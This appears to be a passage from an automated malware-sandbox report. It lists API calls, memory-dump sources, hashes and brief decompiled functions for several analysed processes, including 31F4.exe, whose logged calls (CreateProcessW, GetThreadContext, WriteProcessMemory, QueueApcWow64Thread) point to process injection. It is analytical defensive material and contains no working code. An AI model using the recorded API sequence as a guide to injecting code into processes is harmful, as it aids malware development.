RtlAcquireSRWLockExclusive.1105(6AC586C4,00000008,?,00000000,00000008,?,6ABBF8D6,?,00000000,00000000,?,6AB622D2,00000000,?,00000000,00000034), ref: 6AC380AA
RtlReleaseSRWLockExclusive.1105(6AC586C4,6AC586C4,00000008,?,00000000,00000008,?,6ABBF8D6,?,00000000,00000000,?,6AB622D2,00000000,?,00000000), ref: 6AC380DD
TpSetPoolMaxThreads.1105(00000000,00000000,6AC586C4,6AC586C4,00000008,?,00000000,00000008,?,6ABBF8D6,?,00000000,00000000,?,6AB622D2,00000000), ref: 6AC380F3
TpSetPoolMaxThreadsSoftLimit.1105(00000000,00000000,00000000,00000000,6AC586C4,6AC586C4,00000008,?,00000000,00000008,?,6ABBF8D6,?,00000000,00000000), ref: 6AC380FB

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: ExclusiveLockPoolThreads$AcquireLimitReleaseSoft
String ID:
API String ID: 4208054433-0
Opcode ID: c7a3217baab70dc4090e2b081248227caa4e130a27d767158f97cce5c813f48e
Instruction ID: 95855ebde7d37b72fc5b1f767cffe900e138184d1e568045ecd16be430d46dc7
Opcode Fuzzy Hash: c7a3217baab70dc4090e2b081248227caa4e130a27d767158f97cce5c813f48e
Instruction Fuzzy Hash: F3110B7AB0257167C7145A6D4CA0E8FB6A59B85784B120239FE20EB341FF21CD1197E5

Uniqueness

Uniqueness Score: -1.00%

Function 6ABF2D0B, Relevance: 6.1, APIs: 4, Instructions: 58COMMON

Download Yara Rule

APIs

RtlAcquireSRWLockShared.1105(?,00000000,00000000,00000008,?,?,6ABBFFD2,00000000,?,00000000,00000000,00000000,00001030,000000FF,?,00000000), ref: 6ABF2D24
RtlAcquireSRWLockShared.1105(0000000C,?,00000000,00000000,00000008,?,?,6ABBFFD2,00000000,?,00000000,00000000,00000000,00001030,000000FF,?), ref: 6ABF2D3C

Part of subcall function 6AB8FAD0: RtlDllShutdownInProgress.1105(00000000), ref: 6AB8FB35
Part of subcall function 6AB8FAD0: ZwWaitForAlertByThreadId.1105(?,00000000,?,?,?,?,?,?,?,00000000), ref: 6AB8FBE3

RtlReleaseSRWLockShared.1105(0000000C,0000000C,?,00000000,00000000,00000008,?,?,6ABBFFD2,00000000,?), ref: 6ABF2D6A
RtlReleaseSRWLockShared.1105(?,?,00000000,00000000,00000008,?,?,6ABBFFD2,00000000,?,00000000,00000000,00000000,00001030,000000FF,?), ref: 6ABF2D95

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: LockShared$AcquireRelease$AlertProgressShutdownThreadWait
String ID:
API String ID: 276812241-0
Opcode ID: fc279f48628d91ccb48e8c7f662275fadc06290d31661f8b3858b58f6c73593d
Instruction ID: 0489e26371e85993a94e7e28a820605b6b9379875fcfb2fcc9fc3931238e734c
Opcode Fuzzy Hash: fc279f48628d91ccb48e8c7f662275fadc06290d31661f8b3858b58f6c73593d
Instruction Fuzzy Hash: 0311E3765023C99FCB20CA64C494D5AB3FCEF81328B19489EE94993201DF31ED1AEB90

Uniqueness

Uniqueness Score: -1.00%

Function 6AB8E63F, Relevance: 6.1, APIs: 4, Instructions: 53threadCOMMON

Download Yara Rule

APIs

RtlSetThreadWorkOnBehalfTicket.1105(?,?,?), ref: 6AB8E68B
TpCallbackMayRunLong.1105(?,?,?), ref: 6AB8E6A3
RtlActivateActivationContextUnsafeFast.1105(?,?,?,?,?,6AB99688,?,00000000,00000000,00000001,?,?,7FFE0386), ref: 6ABBE258

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: ActivateActivationBehalfCallbackContextFastLongThreadTicketUnsafeWork
String ID:
API String ID: 3384506009-0
Opcode ID: 09daa6f13e10e10deb403ab3800f05a1ef34cbce950abe0e6d2b8a8228a42360
Instruction ID: 2f4ea8b18e29e89de6cce29af52bf9f8f94bb7184937fcdef938f6cdbe01e0d0
Opcode Fuzzy Hash: 09daa6f13e10e10deb403ab3800f05a1ef34cbce950abe0e6d2b8a8228a42360
Instruction Fuzzy Hash: 3C01D671545A80DFC720CF2DC88875BB7A8EF47328F100669D9544B195EFB1E881D795

Uniqueness

Uniqueness Score: -1.00%

Function 6AC18061, Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 402COMMON

Download Yara Rule

Strings

xn--, xrefs: 6AC180F6, 6AC1810E, 6AC1821C, 6AC18223
xl--, xrefs: 6AC180FD, 6AC18215

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: xl--$xn--
API String ID: 0-2182639396
Opcode ID: 17c3cdd353a3674a39037db4f3a8d045c652299efb9d9f34d7236cca0141e38e
Instruction ID: d087ceb9f3e956ea898a0e016fb7dfe3ea35e41d05d0d9db9cba498a87f3f5c6
Opcode Fuzzy Hash: 17c3cdd353a3674a39037db4f3a8d045c652299efb9d9f34d7236cca0141e38e
Instruction Fuzzy Hash: 7DE1C075F0C2199FDF14CFA8C8D4AADB7B1BF88310F25842AD955A7240EF749D819B80

Uniqueness

Uniqueness Score: -1.00%

Function 6ABEF2B7, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

_wcsicmp.1105(?,?,-00000054,-00000054,00000000), ref: 6ABEF2FB
DbgPrint.1105(AVRF: pid 0x%X: found dll descriptor for `%ws' with verified exports ,?,?,-00000054,-00000054,00000000), ref: 6ABEF323

Strings

AVRF: pid 0x%X: found dll descriptor for `%ws' with verified exports , xrefs: 6ABEF31E

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: Print_wcsicmp
String ID: AVRF: pid 0x%X: found dll descriptor for `%ws' with verified exports
API String ID: 2655330621-555053354
Opcode ID: 303c0a7f4a6a1296787bbef0e112d570867ff990465eff1f14a5172230ea78b7
Instruction ID: 8468dafa49d1e6ae7d41e611386f2d860757120986e0d4c79cbbed689d70357c
Opcode Fuzzy Hash: 303c0a7f4a6a1296787bbef0e112d570867ff990465eff1f14a5172230ea78b7
Instruction Fuzzy Hash: DB21B432904284EFDB15CFA4E980B5DBBF5FF81364F264198D8542B251DB31AD91FB80

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: iwbavbe PID: 1500 Parent PID: 968 iwbavbeCOMMON

Executed Functions

Function 00424690, Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000,?,0041D04B,?,?,00424800), ref: 00424697

Memory Dump Source

Source File: 00000015.00000002.957176777.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.957139929.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.957285074.000000000043E000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.982486448.0000000002B97000.00000002.00020000.sdmp Download File

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: 2ea03846aa0b567229e74ed0acf05d785ccbcc0ad5cbdc7d91d64925a7e8509b
Instruction ID: d35c21fdf9697fae3b8ca4ac9df821949a654717cf36e16e5de8d48c8df027d1
Opcode Fuzzy Hash: 2ea03846aa0b567229e74ed0acf05d785ccbcc0ad5cbdc7d91d64925a7e8509b
Instruction Fuzzy Hash: 10A01132088208A3C2002282A80AF023A0CE3CCBA2F080020F20C0A0A00AA2A82080AA

Uniqueness

Uniqueness Score: -1.00%

Function 0041C890, Relevance: 1.5, APIs: 1, Instructions: 5
COMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_() {
				void* _t3;
				void* _t4;

				E00421A60(); // executed
				return L0041C8B0(_t3, _t4);
			}

0x0041c895
0x0041c8a0

APIs

___security_init_cookie.LIBCMTD ref: 0041C895

Memory Dump Source

Source File: 00000015.00000002.957176777.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.957139929.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.957285074.000000000043E000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.982486448.0000000002B97000.00000002.00020000.sdmp Download File

Similarity

API ID: ___security_init_cookie
String ID:
API String ID: 3657697845-0
Opcode ID: 989a3b1cde8d75633caca1be5d45cca953f1b250fff02efc506c9fb5d63ec8e4
Instruction ID: f581d8896d31454078740312df8d18a426b6ba7321f9ba9bd526a071552ec979
Opcode Fuzzy Hash: 989a3b1cde8d75633caca1be5d45cca953f1b250fff02efc506c9fb5d63ec8e4
Instruction Fuzzy Hash: ABA0026154569C16155133A71987A4A754D48D07597D5001B7519021135D5CA98240AE

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00426440, Relevance: 7.6, APIs: 5, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00426440(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				long _t15;
				intOrPtr _t19;
				intOrPtr _t20;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				intOrPtr _t25;
				intOrPtr* _t29;
				void* _t34;

				_t25 = __esi;
				_t24 = __edi;
				_t22 = __edx;
				_t20 = __ecx;
				_t19 = __ebx;
				_t6 = __eax;
				_t34 = _t20 -  *0x43e4a0; // 0xb6eee1f7
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x43ff40 = _t6;
				 *0x43ff3c = _t20;
				 *0x43ff38 = _t22;
				 *0x43ff34 = _t19;
				 *0x43ff30 = _t25;
				 *0x43ff2c = _t24;
				 *0x43ff58 = ss;
				 *0x43ff4c = cs;
				 *0x43ff28 = ds;
				 *0x43ff24 = es;
				 *0x43ff20 = fs;
				 *0x43ff1c = gs;
				asm("pushfd");
				_pop( *0x43ff50);
				 *0x43ff44 =  *_t29;
				 *0x43ff48 = _v0;
				 *0x43ff54 =  &_a4;
				 *0x43fe90 = 0x10001;
				_t11 =  *0x43ff48; // 0x0
				 *0x43fe44 = _t11;
				 *0x43fe38 = 0xc0000409;
				 *0x43fe3c = 1;
				_t21 =  *0x43e4a0; // 0xb6eee1f7
				_v812 = _t21;
				_t23 =  *0x43e4a4; // 0x49111e08
				_v808 = _t23;
				 *0x43fe88 = IsDebuggerPresent();
				_push(1);
				E00426420(_t12);
				SetUnhandledExceptionFilter(0);
				_t15 = UnhandledExceptionFilter(0x409f6c);
				if( *0x43fe88 == 0) {
					_push(1);
					E00426420(_t15);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

APIs

IsDebuggerPresent.KERNEL32 ref: 0042EA5D
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042EA74
UnhandledExceptionFilter.KERNEL32(00409F6C), ref: 0042EA7F
GetCurrentProcess.KERNEL32(C0000409), ref: 0042EA9D
TerminateProcess.KERNEL32(00000000), ref: 0042EAA4

Memory Dump Source

Source File: 00000015.00000002.957176777.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.957139929.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.957285074.000000000043E000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.982486448.0000000002B97000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: c59e8f8781e30871d07173c26a070c807a816239214ee763875908e28398e7d7
Instruction ID: cfa9524a3b12b8b773824b8592d4e3ae2adb55ecfbbfffa1025ce60c7e413f30
Opcode Fuzzy Hash: c59e8f8781e30871d07173c26a070c807a816239214ee763875908e28398e7d7
Instruction Fuzzy Hash: 8621F0B9D012049BC300DF55FA866487BA4BB5E325F60607BED08963B2E7B45989CF4E

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: 31F4.exe PID: 5508 Parent PID: 3424 31F4.exeCOMMON

Executed Functions

Function 022E48D0, Relevance: 1.6, APIs: 1, Instructions: 66memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?), ref: 022E495B

Memory Dump Source

Source File: 00000016.00000002.921859372.00000000022E0000.00000040.00000001.sdmp, Offset: 022E0000, based on PE: false

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 13b760e6859fd34eabd76e5870af7cbf0d6c1a76f20ce2ec46a67eb6653b9900
Instruction ID: 2f5ae49c347f9421b6aaf9e1eb905987516834d4a648d3aa172b494ab79e5c04
Opcode Fuzzy Hash: 13b760e6859fd34eabd76e5870af7cbf0d6c1a76f20ce2ec46a67eb6653b9900
Instruction Fuzzy Hash: C42112B59002099FCF10DFA9D884AEEFBF5FF48314F50882AE919B7200C7799945CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 022E48D8, Relevance: 1.6, APIs: 1, Instructions: 61memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?), ref: 022E495B

Memory Dump Source

Source File: 00000016.00000002.921859372.00000000022E0000.00000040.00000001.sdmp, Offset: 022E0000, based on PE: false

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 17d8e9f27e3f2a4e5ce9dd6387124e9dbd8b941a1b20d431e286cce67530ddd3
Instruction ID: c6ca9cf2bd643bf2bbd5969291e8a3df8f39e1600dfeebcbbf11db8c0c0b5691
Opcode Fuzzy Hash: 17d8e9f27e3f2a4e5ce9dd6387124e9dbd8b941a1b20d431e286cce67530ddd3
Instruction Fuzzy Hash: 9321F575D002099FCF10DFA9D884ADEFBF9FF48314F50842AE519A7210C7759945DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 022E3803, Relevance: 1.7, APIs: 1, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.921859372.00000000022E0000.00000040.00000001.sdmp, Offset: 022E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e093fa3732ebff0b102b38ebb3df728a34e144c87357a7ffd681eaf3e9722eb2
Instruction ID: 8fc569dead9bd04d472ff48f806a89945b85c543b70f9ea59a231b87da12b631
Opcode Fuzzy Hash: e093fa3732ebff0b102b38ebb3df728a34e144c87357a7ffd681eaf3e9722eb2
Instruction Fuzzy Hash: 517156719012698FEF20CFA5C854BEDBBB6BF48304F5485EAD80AB7244CB745A85DF90

Uniqueness

Uniqueness Score: -1.00%

Function 022E3AFC, Relevance: 1.7, APIs: 1, Instructions: 160processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000,00000009,?,?,?,?,?,?,?), ref: 022E3C47

Memory Dump Source

Source File: 00000016.00000002.921859372.00000000022E0000.00000040.00000001.sdmp, Offset: 022E0000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: c21490208c77ce1bfe7cb9c8538a4e5bc63acc3ba0ac070cef160da7647333ee
Instruction ID: 02436108567f1531d1fc9dd057be0ea840dd785b543e96e43924d753ff99ed9a
Opcode Fuzzy Hash: c21490208c77ce1bfe7cb9c8538a4e5bc63acc3ba0ac070cef160da7647333ee
Instruction Fuzzy Hash: 91513971801269CFEF20CFA5C840BEDBBB5BF48314F54859AD909B7240D7759A85CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 022E3D44, Relevance: 1.7, APIs: 1, Instructions: 160threadCOMMON

Download Yara Rule

APIs

GetThreadContext.KERNELBASE(?,?), ref: 022E3E50

Memory Dump Source

Source File: 00000016.00000002.921859372.00000000022E0000.00000040.00000001.sdmp, Offset: 022E0000, based on PE: false

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: 0d77f58c6fdd1b2b0582e8126a628805dc343234235d331e8f2f7be51f3283b1
Instruction ID: 7ed428dbaa3fb1785aeb9bbb1d7bd6c4354cdbea648df9f7469309e20593b35b
Opcode Fuzzy Hash: 0d77f58c6fdd1b2b0582e8126a628805dc343234235d331e8f2f7be51f3283b1
Instruction Fuzzy Hash: 674136719103298FDB66DF69C8847EEBBB9AF44204F5084E9D40DA7240CB745F89CF90

Uniqueness

Uniqueness Score: -1.00%

Function 022E3D50, Relevance: 1.7, APIs: 1, Instructions: 155threadCOMMON

Download Yara Rule

APIs

GetThreadContext.KERNELBASE(?,?), ref: 022E3E50

Memory Dump Source

Source File: 00000016.00000002.921859372.00000000022E0000.00000040.00000001.sdmp, Offset: 022E0000, based on PE: false

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: 84f7bea9b6372bf2ec59698fb448a2a66444307ce1c8c856cb850e5657431395
Instruction ID: 7256e0cffd5c907b4a5b34a809a9986474db4f09b6433f747bda0268c5342019
Opcode Fuzzy Hash: 84f7bea9b6372bf2ec59698fb448a2a66444307ce1c8c856cb850e5657431395
Instruction Fuzzy Hash: 944117709103288FDB66DF69C8847EEBBB9AF45604F5484E9D40DA7240CB746F89CF81

Uniqueness

Uniqueness Score: -1.00%

Function 022E3B08, Relevance: 1.7, APIs: 1, Instructions: 154processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000,00000009,?,?,?,?,?,?,?), ref: 022E3C47

Memory Dump Source

Source File: 00000016.00000002.921859372.00000000022E0000.00000040.00000001.sdmp, Offset: 022E0000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 4e65ca995b7407a439252eb7e3ad955c0bbd1b1fb1c2f0f61004466223c9aaae
Instruction ID: cf5c76a22212a426e1be3275a7fcb27575679bb255448577e4cdb0485dfb4254
Opcode Fuzzy Hash: 4e65ca995b7407a439252eb7e3ad955c0bbd1b1fb1c2f0f61004466223c9aaae
Instruction Fuzzy Hash: DA512B71900229CFEF20CF95C844BEDBBB6BF48314F54859AD809B7250D7759A85DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 022E4438, Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 022E44C8

Memory Dump Source

Source File: 00000016.00000002.921859372.00000000022E0000.00000040.00000001.sdmp, Offset: 022E0000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 7d804fc8151bac695703ae04d23491319d330a8df874b841a711d227a3c5419b
Instruction ID: cb7eb11638ef5b54d3d899fbd4f48c9bfe42fab5ec4da6e7adaa1923aaeeb533
Opcode Fuzzy Hash: 7d804fc8151bac695703ae04d23491319d330a8df874b841a711d227a3c5419b
Instruction Fuzzy Hash: 7D2155759003099FCF00DFA9C884BEEBBF5FF48314F54882AE919A7240C7789944DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 022E4430, Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 022E44C8

Memory Dump Source

Source File: 00000016.00000002.921859372.00000000022E0000.00000040.00000001.sdmp, Offset: 022E0000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 6ef6f372577d3140942799fc1cd9b4011d772f1363e313670836a7bebcb753e3
Instruction ID: 6e70f412fd40102768a00e610b2f2f3ec70a7125df7a1577d9789afdbe8fad49
Opcode Fuzzy Hash: 6ef6f372577d3140942799fc1cd9b4011d772f1363e313670836a7bebcb753e3
Instruction Fuzzy Hash: 0E214675A002598FCF00DFA9C984BEEBBF5FF48314F54882AE919A7240C7789944DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 022E4750, Relevance: 1.6, APIs: 1, Instructions: 58threadCOMMON

Download Yara Rule

APIs

RtlQueueApcWow64Thread.NTDLL(?,?,?,?,?), ref: 022E47C6

Memory Dump Source

Source File: 00000016.00000002.921859372.00000000022E0000.00000040.00000001.sdmp, Offset: 022E0000, based on PE: false

Similarity

API ID: QueueThreadWow64
String ID:
API String ID: 1120405860-0
Opcode ID: 2c090289ae56e13d216d970d7b20c626498c60579a3122bdc61cf01420920ce7
Instruction ID: db371c21a49834f7066575aab0a52613b5e7ee3ee27f1bd8e278026923647acb
Opcode Fuzzy Hash: 2c090289ae56e13d216d970d7b20c626498c60579a3122bdc61cf01420920ce7
Instruction Fuzzy Hash: BE1159759002098FCF10DFE9D844BEFBBF9EB49314F148819D519AB250C7759945DB90

Uniqueness

Uniqueness Score: -1.00%

Function 022E4758, Relevance: 1.6, APIs: 1, Instructions: 53threadCOMMON

Download Yara Rule

APIs

RtlQueueApcWow64Thread.NTDLL(?,?,?,?,?), ref: 022E47C6

Memory Dump Source

Source File: 00000016.00000002.921859372.00000000022E0000.00000040.00000001.sdmp, Offset: 022E0000, based on PE: false

Similarity

API ID: QueueThreadWow64
String ID:
API String ID: 1120405860-0
Opcode ID: 71bd7c351e6eb4c3e776db949f90ae7e54785295558429433c303b6cb36b6d28
Instruction ID: 39220b34cd0b4cfdb8c410fb9932ca596c5f4525e91158cf2d2deaa75e0a94f2
Opcode Fuzzy Hash: 71bd7c351e6eb4c3e776db949f90ae7e54785295558429433c303b6cb36b6d28
Instruction Fuzzy Hash: DD1153759002088FCF10DFA9C844BEFBBF9AB88324F14881AE519A7240C779A944DBA0

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: 3C84.exe PID: 4544 Parent PID: 3424 3C84.exeCOMMON

Executed Functions

Function 01140520, Relevance: 1.7, Strings: 1, Instructions: 437COMMON

Download Yara Rule

Strings

x+m, xrefs: 01140C9F

Memory Dump Source

Source File: 00000017.00000002.1072787984.0000000001140000.00000040.00000001.sdmp, Offset: 01140000, based on PE: false

Similarity

API ID:
String ID: x+m
API String ID: 0-835955970
Opcode ID: b9f0efc114aa5b98fc7fb924a41cb15e05ee70435c2129f260144b3b9f0601fc
Instruction ID: f2b5327e6ee260c705566f94c1da5cf8104cf53cdba7c0dbc1ae7e0123fe3867
Opcode Fuzzy Hash: b9f0efc114aa5b98fc7fb924a41cb15e05ee70435c2129f260144b3b9f0601fc
Instruction Fuzzy Hash: CE229B74E00228CFDB64DF69C884BD9BBB2BB89300F1085E9D549AB355DB319E85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 01140DC0, Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.1072787984.0000000001140000.00000040.00000001.sdmp, Offset: 01140000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0a2c6054eed22bca3763924b02929004db2c66f13a64502251d5a7d115e38ef
Instruction ID: 623d2a86afd41d0e57b9a03dcf23ef69cb69fdc6ec4442023347fd1138d2b29b
Opcode Fuzzy Hash: a0a2c6054eed22bca3763924b02929004db2c66f13a64502251d5a7d115e38ef
Instruction Fuzzy Hash: B381A474E00208CFDB58DFA9D494A9DBBB2FF89305F21906AE915AB765DB319C46CF00

Uniqueness

Uniqueness Score: -1.00%

Function 01140DD0, Relevance: .2, Instructions: 194COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.1072787984.0000000001140000.00000040.00000001.sdmp, Offset: 01140000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6701f11ab9319e520a52d31a64c68c035d53266670dc56ec54b86b50de2f7c99
Instruction ID: 9ae77aa0d28b5a3b863f706f8c85dbc71ebbcecac9486e30070967a7c1b2e858
Opcode Fuzzy Hash: 6701f11ab9319e520a52d31a64c68c035d53266670dc56ec54b86b50de2f7c99
Instruction Fuzzy Hash: 9D819374E00208CFDB58DFA9D494A9DBBB2FF89305F219069E915AB365DB31AC46CF00

Uniqueness

Uniqueness Score: -1.00%

Function 011489D0, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 291libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExA.KERNEL32(?,?,?), ref: 01148CE2

Strings

/0m, xrefs: 01148A05

Memory Dump Source

Source File: 00000017.00000002.1072787984.0000000001140000.00000040.00000001.sdmp, Offset: 01140000, based on PE: false

Similarity

API ID: LibraryLoad
String ID: /0m
API String ID: 1029625771-4094372797
Opcode ID: bb551523ec91efedfd28914e6b43f759c319f962b20ad8e8fe63f25bfe8355de
Instruction ID: 65d22ae840984d50804e32cb50d2270bef3cd47fac6f0ff6991a7af81f97ce46
Opcode Fuzzy Hash: bb551523ec91efedfd28914e6b43f759c319f962b20ad8e8fe63f25bfe8355de
Instruction Fuzzy Hash: 77A18B70B042098FDB18DFE9C4556AEBBF6AF84A04F14842DE546EB384DF789802CB51

Uniqueness

Uniqueness Score: -1.00%

Function 01147E0F, Relevance: 1.6, APIs: 1, Instructions: 134libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExA.KERNEL32(?,?,?), ref: 01148CE2

Memory Dump Source

Source File: 00000017.00000002.1072787984.0000000001140000.00000040.00000001.sdmp, Offset: 01140000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 9eebbb5e7e096192d9f6aed53e5b3ad15d9c00e8ceee3f6d87d942a614c122c4
Instruction ID: d4015cefedf0e50a115626680b1e9a427e67318185dac974369b5ae1f3f02df0
Opcode Fuzzy Hash: 9eebbb5e7e096192d9f6aed53e5b3ad15d9c00e8ceee3f6d87d942a614c122c4
Instruction Fuzzy Hash: 53510FB4E012089FDB14CFE9D884BDDBBF1BB49714F14802AE855AB350D774A885CF84

Uniqueness

Uniqueness Score: -1.00%

Function 01149808, Relevance: 1.6, APIs: 1, Instructions: 96memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 011498B7

Memory Dump Source

Source File: 00000017.00000002.1072787984.0000000001140000.00000040.00000001.sdmp, Offset: 01140000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 6ab4bc88f109c328c7951e5863e240732d77f5e9d0ca3a5d2842e8619befe8a5
Instruction ID: 8680946eafdde4a22cb4137a7081d1901c661c59afa6c4b3bec279ceca790463
Opcode Fuzzy Hash: 6ab4bc88f109c328c7951e5863e240732d77f5e9d0ca3a5d2842e8619befe8a5
Instruction Fuzzy Hash: 5D31A8B9D00258DFCB14CFA9E584AEEFBB4AB09314F14902AE814B7310D774A949DF64

Uniqueness

Uniqueness Score: -1.00%

Function 01149810, Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 011498B7

Memory Dump Source

Source File: 00000017.00000002.1072787984.0000000001140000.00000040.00000001.sdmp, Offset: 01140000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 1fbc04294ee4834d1c855740dc71c1b7b96a1dd43231a48cd29b6704619588c0
Instruction ID: 92121671453f9cd8bea50996fb859f25ad6f1279c439c255bea7be1a41527e5b
Opcode Fuzzy Hash: 1fbc04294ee4834d1c855740dc71c1b7b96a1dd43231a48cd29b6704619588c0
Instruction Fuzzy Hash: B931A7B9D00258DFCB14CFA9E884AEEFBB0AB09314F14902AE814B7310D374A945CFA4

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 011491CC, Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.1072787984.0000000001140000.00000040.00000001.sdmp, Offset: 01140000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9312be2b78cb2fe053e7cd5a4b3d1ef990b6e1550a0ed110df9748e03ad17b13
Instruction ID: 744f66ef4ed6eb78356b2b01c22f2cb34a88a9fbaa5063b917f7f7d9a53c5a5b
